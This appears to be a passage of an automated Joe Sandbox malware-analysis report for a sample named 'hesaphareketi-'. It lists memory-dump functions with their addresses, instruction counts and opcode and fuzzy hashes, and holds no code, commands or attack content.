                                            • Instruction Fuzzy Hash: FC31C475E043494FDF12DBB898506EEBFB2AF8A200B0944A7D044EB253E7309A05D762
                                            Function 05772B50 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 25d645532335440200cfcf78b4e0b7f5e0607e286833e1f44f792204cb7a9721
                                            • Instruction ID: 1ef985e0115a8a47f9f79d7386a1edb19da549e5fb25952312320454a6583d14
                                            • Opcode Fuzzy Hash: 25d645532335440200cfcf78b4e0b7f5e0607e286833e1f44f792204cb7a9721
                                            • Instruction Fuzzy Hash: 49310835B043444FCB11DF78E50989BBBF6BF86200705C8AAE415DB352EF71E80A9BA1
                                            Function 05774EA8 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c1507a4afd95b2c17ffe5cae452b8b6b0d5301f2062aae7fce9997b198ff220
                                            • Instruction ID: 80ab3d13f24144aa6997f75346171f96ca8a649f83ee9367436f9e9e77d83484
                                            • Opcode Fuzzy Hash: 2c1507a4afd95b2c17ffe5cae452b8b6b0d5301f2062aae7fce9997b198ff220
                                            • Instruction Fuzzy Hash: C9312871714B099FDF34CF38E445A2AB7E7FB85225F080E2AE0BACB641D760E8159791
                                            Function 05772DE0 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4c2d35a4840b7b43d21f24dc5bdff1568f2013ff31800f5ae18b719f83c57559
                                            • Instruction ID: 4bcc9c54935a479773f8cb7093a910890f1a12b84e595f54ef2be62d41de795f
                                            • Opcode Fuzzy Hash: 4c2d35a4840b7b43d21f24dc5bdff1568f2013ff31800f5ae18b719f83c57559
                                            • Instruction Fuzzy Hash: 93318075F002596FCF15DBA9D9089BFBBFAAFC4200F14816AE564D7252EB708A0197E0
                                            Function 0577A4CB Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce64f4c449acd31087a83bed62306d9676ea7ca17292ab7fd693e6be3d0ea0fc
                                            • Instruction ID: a76a6d4f29a4290eda9731bfa01f4405454ba4f612fb99cdb59e3ec2e5c7bad9
                                            • Opcode Fuzzy Hash: ce64f4c449acd31087a83bed62306d9676ea7ca17292ab7fd693e6be3d0ea0fc
                                            • Instruction Fuzzy Hash: 4F31CE357042489FDF218F25D895FAA7BB2FF86710F0544AEE946CB762C635E842DB20
                                            Function 0577D7A0 Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec92f47cf0496a68e6c749321d14c32c297cee9e576b9c76da69a2d8b4f8221f
                                            • Instruction ID: b9301398e55f4d8538da7d4b1e4b0b33c790f5e70b5b83fac4a8b646c64cf75e
                                            • Opcode Fuzzy Hash: ec92f47cf0496a68e6c749321d14c32c297cee9e576b9c76da69a2d8b4f8221f
                                            • Instruction Fuzzy Hash: 78315C74A00609DFCF14DFA5D844AAEBBF2FF89700F148059E90AA7361D732D952DBA1
                                            Function 05772780 Relevance: .1, Instructions: 85COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e321a0ecd5121a075b5e6ddd6b580ec1a5025e7a397958f1f76a2b1dca9220b4
                                            • Instruction ID: e9cb25787d22f986bb8b14e48e32188faaed058d6ead7411fa23a5f461ad1c93
                                            • Opcode Fuzzy Hash: e321a0ecd5121a075b5e6ddd6b580ec1a5025e7a397958f1f76a2b1dca9220b4
                                            • Instruction Fuzzy Hash: 5A210A76F083894FDF029B7899605FE7F72DF96240B584493C450DB293E6248D0AD7A2
                                            Function 05777E06 Relevance: .1, Instructions: 81COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 646dfa265b3b0353c313b6c965297467fb2949a57a47b36b747b97b80d290c45
                                            • Instruction ID: 42719ad10cb28f75b65bd5c32a568b84eaecbf25e355a0bf46872442f63e68a3
                                            • Opcode Fuzzy Hash: 646dfa265b3b0353c313b6c965297467fb2949a57a47b36b747b97b80d290c45
                                            • Instruction Fuzzy Hash: E3213A706483588FE7199F64F41A76A7FA1EF46704F00889AD5418B393DBF58C09AB51
                                            Function 05775918 Relevance: .1, Instructions: 81COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2683cefb4d1cb683d4750053940794a45c9d357a59fc9fac9337a95198b232ab
                                            • Instruction ID: 52f9574abe4799fee046c688ebe1f629ee1f3a6c7b499248c5f107a5f0533e94
                                            • Opcode Fuzzy Hash: 2683cefb4d1cb683d4750053940794a45c9d357a59fc9fac9337a95198b232ab
                                            • Instruction Fuzzy Hash: 0831EC70A0474A8FCF00DF64E8845BF7BB2FF46300B14886AE806EB266E634DD05C761
                                            Function 0098D0B8 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1236941468.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_98d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 48b154c9b70f81a0e66656ad187aa420e98ac84c3245a87cb3dedd96285e1aa1
                                            • Instruction ID: 0d979f1241e53c3c5305bba535189792b592fad2b9f1a01110677925a2fc2e94
                                            • Opcode Fuzzy Hash: 48b154c9b70f81a0e66656ad187aa420e98ac84c3245a87cb3dedd96285e1aa1
                                            • Instruction Fuzzy Hash: 4821F472509240EFDB19EF10D9C4B16BBA6FF88314F248669E9490A395C33AD856CB61
                                            Function 05774EB8 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9a6f29b51bfbbe9cee2a4f224d959582a0430ab6f257d9c0bea856f50ef8780
                                            • Instruction ID: eab54ad13dde351b76d9b546294353dbb8c0ce1fd7cf25a61a38961f5853bec2
                                            • Opcode Fuzzy Hash: f9a6f29b51bfbbe9cee2a4f224d959582a0430ab6f257d9c0bea856f50ef8780
                                            • Instruction Fuzzy Hash: DA21C871610B099FDF34CE38E446A26B7F6FB45214F080E2AE0AACB641D770E8559B91
                                            Function 05776803 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5172881553469ad432df0eb661e59a4447581136cc4f455a523ab93db76e97ab
                                            • Instruction ID: ec102bf7c1e1161aa436b13bb8f27cff9b3e2d00a04fa6f63548b5df566915d6
                                            • Opcode Fuzzy Hash: 5172881553469ad432df0eb661e59a4447581136cc4f455a523ab93db76e97ab
                                            • Instruction Fuzzy Hash: 3821F536A00A189BDB01AF64E888B7FB6A7FB84712F448425E945D7294DB34CC52E7D1
                                            Function 05775B68 Relevance: .1, Instructions: 73COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7e642344acdc07a4422df67fa75cdf19060ee0539ecfa93e5f384cbf692f4899
                                            • Instruction ID: 7bde59ae95dd4002c5b84ff5c854e67e43ffb4a898d3f2594bfe5654e785a88e
                                            • Opcode Fuzzy Hash: 7e642344acdc07a4422df67fa75cdf19060ee0539ecfa93e5f384cbf692f4899
                                            • Instruction Fuzzy Hash: 5A2159716002189FDB20DF1AE484FAABBB6FF88610F05405EE9468B722D730E841DB64
                                            Function 0099D36C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237413044.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_99d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84aac78976a506de7a0bd97f206b3514f8c2aa645c865bac2695ac45e5080d40
                                            • Instruction ID: 078316df743b8761f48b0a5a37f66674ee42c4a2106dfbc66bb6884abbabd783
                                            • Opcode Fuzzy Hash: 84aac78976a506de7a0bd97f206b3514f8c2aa645c865bac2695ac45e5080d40
                                            • Instruction Fuzzy Hash: FC213471604300DFDF04DF18D9C4B26BBA5FB88329F24C96DE8094F292C33AD846CA62
                                            Function 0099D1B4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237413044.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_99d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a9e969473231b8e4e1e805dc47bbd899c1914991067f5070f28d8936cb9152f
                                            • Instruction ID: aea5988303118a35af41597493e1472649e96887ead22215dac89aa4a6a9a42b
                                            • Opcode Fuzzy Hash: 0a9e969473231b8e4e1e805dc47bbd899c1914991067f5070f28d8936cb9152f
                                            • Instruction Fuzzy Hash: 4D210475609300DFDF14DF18D9C0B2ABB65FB84324F20C9ADE8494B296C33AD846CB61
                                            Function 05775B84 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61dde52dbbacddc3a3b0300ce95b900fbe806976348864e5c906102cea10af7c
                                            • Instruction ID: 3fc926cd74c1116a6c0a852e0aca5694af076f44687d0c6039b800e752735804
                                            • Opcode Fuzzy Hash: 61dde52dbbacddc3a3b0300ce95b900fbe806976348864e5c906102cea10af7c
                                            • Instruction Fuzzy Hash: 02213B757002189FDB249E1AE584E7EB7A6FF88720B11842EEA068B751DB71E841DB60
                                            Function 05778568 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d28c67c06e05db5d7a8be9d0ed816dedec71ecf5cd7ec81384516e3691e5e69
                                            • Instruction ID: b449767b28a32dea3bbe88d233538da79fa781c6476a4f53b34f7d5e6d8d4924
                                            • Opcode Fuzzy Hash: 6d28c67c06e05db5d7a8be9d0ed816dedec71ecf5cd7ec81384516e3691e5e69
                                            • Instruction Fuzzy Hash: 3011E634B043085FDF25D626E868B7677A6FBC5710F54C46AE405CB292CB70D80A9752
                                            Function 05776A5F Relevance: .1, Instructions: 67COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a8398dd92a28ebf9a1222d42386936aac3bbac4409d9b6316f4cd8280fdb5e6
                                            • Instruction ID: 47a35f0f1109ba6b763a8cf6ba1535bedb178734b224a71a1b17a8aede41248d
                                            • Opcode Fuzzy Hash: 5a8398dd92a28ebf9a1222d42386936aac3bbac4409d9b6316f4cd8280fdb5e6
                                            • Instruction Fuzzy Hash: A621BE71A0061A8BCF00DF65E8805BFBBB6FF45301B148466EC09EB265E230DD15CBA1
                                            Function 0577A543 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e80ea5526c6c796927271b96f3e03c6a3fdba3c46e5b67639c3763ed18115b1
                                            • Instruction ID: 9ea3c9277b7a160a6553702ff837f407e8646b2ae4333e861ecaf89ab09bef12
                                            • Opcode Fuzzy Hash: 9e80ea5526c6c796927271b96f3e03c6a3fdba3c46e5b67639c3763ed18115b1
                                            • Instruction Fuzzy Hash: 522158357006089FDB20CE16D484FAEB7B6BF88714F05802DEA4687751C731E841DF20
                                            Function 0577AE60 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 173a8068ce8ab4a194c25f30cf42057ac1e506b06b35e6e4a8d0b0ae36e95a38
                                            • Instruction ID: 8c71a7879e98f64118a92211f657edde449d93c95e178f375340016e79795f4e
                                            • Opcode Fuzzy Hash: 173a8068ce8ab4a194c25f30cf42057ac1e506b06b35e6e4a8d0b0ae36e95a38
                                            • Instruction Fuzzy Hash: 3F21CC71E0020A9FCB04DFA9C9449AFFBF9FF98310B11C55AE519A7211E770A956CB90
                                            Function 05775BD8 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dfe45f49c09d9f28f916f8d5d41276512d2d4949115b9c75848bc7f56a1580ac
                                            • Instruction ID: 062a226bcdb372ef6a4f50b82cff8617736d43470d175edbbee830c66c3eee52
                                            • Opcode Fuzzy Hash: dfe45f49c09d9f28f916f8d5d41276512d2d4949115b9c75848bc7f56a1580ac
                                            • Instruction Fuzzy Hash: 5D21EA71E1020A9F8B04DFADC8849AFFBF9FF98310B10C51AE518E7211E770A956CB90
                                            Function 05778578 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 048e14cb4665ff3dadffd2bfc690d5e3b283734f088ecdbb4199c990d3a3281b
                                            • Instruction ID: 887d3599d274da9d24305e4efb1bad7a29c5ecbef3d933ae65829fe5d1aa6de0
                                            • Opcode Fuzzy Hash: 048e14cb4665ff3dadffd2bfc690d5e3b283734f088ecdbb4199c990d3a3281b
                                            • Instruction Fuzzy Hash: 5E11A5347043085BDF25DA26E859B6A7397FBC4710F14C93AE8059B385CB70E8069792
                                            Function 0577F910 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 59b6309cddb0a5522ef65e1bf2a056ed6164d817ec13e6ce14624df1fece28fe
                                            • Instruction ID: 3af9a80d9f20bce098e60f1513803dc7475d3b4f976153406b807ed4f4c7daae
                                            • Opcode Fuzzy Hash: 59b6309cddb0a5522ef65e1bf2a056ed6164d817ec13e6ce14624df1fece28fe
                                            • Instruction Fuzzy Hash: DA112C31719350AFDB121734A869BA53FB1AF87112F0500E6F881CB2A1EA355846D7A1
                                            Function 0098D0B3 Relevance: .1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1236941468.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_98d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ce60a6613beba357b00576ac525f5d38281a445edcd2f7d64ba7977a5eeb665
                                            • Instruction ID: a943977fdd23ea19be358db1387d4c07935fb1a67259bc4606aab1ccdad0df9b
                                            • Opcode Fuzzy Hash: 5ce60a6613beba357b00576ac525f5d38281a445edcd2f7d64ba7977a5eeb665
                                            • Instruction Fuzzy Hash: AF219076504280DFCF1ADF10D9C4B16BF72FF88314F2486A9D9490B256C33AD856CB91
                                            Function 0577A510 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fa64693c1eb988bd4b0737f91b7ce61dfb13b8465c3111887bd4f27b31dfc7c7
                                            • Instruction ID: e5439d78d16055bffb7e54ee278cfaac42fc2ebc60821960a5ed277941101461
                                            • Opcode Fuzzy Hash: fa64693c1eb988bd4b0737f91b7ce61dfb13b8465c3111887bd4f27b31dfc7c7
                                            • Instruction Fuzzy Hash: 221104723041049FCB06AB68E844DBDBB7AEF8A610715009AF605CB223DBB29C03DB71
                                            Function 057747EE Relevance: .1, Instructions: 54COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ca3c80bd4657b172979a69e8d5062075771ac6d39063a3d3fa28a68c8d246274
                                            • Instruction ID: f4756906d7242684ca471288c47020a2ce5d6fe2a62d8fc72cae31006de43d04
                                            • Opcode Fuzzy Hash: ca3c80bd4657b172979a69e8d5062075771ac6d39063a3d3fa28a68c8d246274
                                            • Instruction Fuzzy Hash: B91132B1C043888FCB20DFAAD445B8EFBF4EB48320F14845AE959A7351C339A944CFA1
                                            Function 0099D1AF Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237413044.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_99d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction ID: c2e2d19f523ab7806c99527eb6919adb0f5cf1629df5eca28263230ecba6c735
                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction Fuzzy Hash: 2F119D75504280DFDB05CF14D5C4B19BBA2FB84324F24C6AED8494B696C33AD84ACBA1
                                            Function 0099D367 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237413044.000000000099D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0099D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_99d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction ID: 47094e0e1298b77bb448f2c583114e46cbc10b34349df5c8cbc396d32a99ab88
                                            • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                            • Instruction Fuzzy Hash: 6B118E75504240DFCB05CF14D5C4B15BBA1FB84324F24C6ADD8494B6A6C33AE84ACF61
                                            Function 05775A08 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ffde384803e2ed88c5e168bb405f90b99cc6077387a9acfcd2aa6eacda19e6e1
                                            • Instruction ID: 5cb71164af81c5dc41bf1571ae3e7e4a09b69306bf93566edb53c80cd28fc850
                                            • Opcode Fuzzy Hash: ffde384803e2ed88c5e168bb405f90b99cc6077387a9acfcd2aa6eacda19e6e1
                                            • Instruction Fuzzy Hash: F211A5303147144BE715AB78D4797AA3B95EF41704F01845AE1468F2A3CFB5984A93A6
                                            Function 05772740 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1cf25f8be5108b9dc166e6e6c9d6acfba4b33e0dd631987326398d359a6bcc6
                                            • Instruction ID: 41c93629e0c67cb49a93a5b8a2c2cc7b8c30af8d85c2e118253617a7dcf4c610
                                            • Opcode Fuzzy Hash: e1cf25f8be5108b9dc166e6e6c9d6acfba4b33e0dd631987326398d359a6bcc6
                                            • Instruction Fuzzy Hash: 9A1104B5C146089FCB20DF9AD444B9EFBF5EB48320F14842AE819A7310D779A945CFA1
                                            Function 05773A22 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ff2a87e6afbcfb6db327a98fc467ed74f56db25f037cbe0b50d902125c0e4b0
                                            • Instruction ID: b05ecf6161eb311a2195d6f1ed63d17366d4cbaf25fc407fdb6fba363d601b3f
                                            • Opcode Fuzzy Hash: 3ff2a87e6afbcfb6db327a98fc467ed74f56db25f037cbe0b50d902125c0e4b0
                                            • Instruction Fuzzy Hash: 3301F775B005189FCF01BFA8A859ABFBBF6EB89500F100479E505E7340DA344A01B7EB
                                            Function 05774200 Relevance: .0, Instructions: 50COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 498e5194b11517b880c9e599faa8e994ec1fbc35f9037d2fc2315e4c015d72ee
                                            • Instruction ID: 51892ac03f5f2876b19f20f72c87fbd65992446d7b8d41639625910795dc7a51
                                            • Opcode Fuzzy Hash: 498e5194b11517b880c9e599faa8e994ec1fbc35f9037d2fc2315e4c015d72ee
                                            • Instruction Fuzzy Hash: 8301D661B082481FDF09DBB5A81897A7FFBDAC2010B1580BAE006D7652ED30C813A361
                                            Function 05773103 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d482e736d6bcef536abc936af54d80730601854be07a670eaabfe22bd6ec59e
                                            • Instruction ID: 40a5396d836c90a4e207085ae360394c183ec5c4840e135eecaabacbb75570ba
                                            • Opcode Fuzzy Hash: 8d482e736d6bcef536abc936af54d80730601854be07a670eaabfe22bd6ec59e
                                            • Instruction Fuzzy Hash: BC1104B5C006088FCB10DF9AD845B8EFBF4EB48320F14842AD819A7310D778A945CFA1
                                            Function 057741C8 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 48fde40c91c52204fa134f70e26bf5d87b1477f255a85ec720805c71c8cffa67
                                            • Instruction ID: 040e29ffc26ea772bae1cf251583067a6feef5699702fe5a74388c09f3e81b7c
                                            • Opcode Fuzzy Hash: 48fde40c91c52204fa134f70e26bf5d87b1477f255a85ec720805c71c8cffa67
                                            • Instruction Fuzzy Hash: 5401A952E1D3941FEB12DB78AC64AEA7FB58E82014F0640E7D084DB163F520494AD396
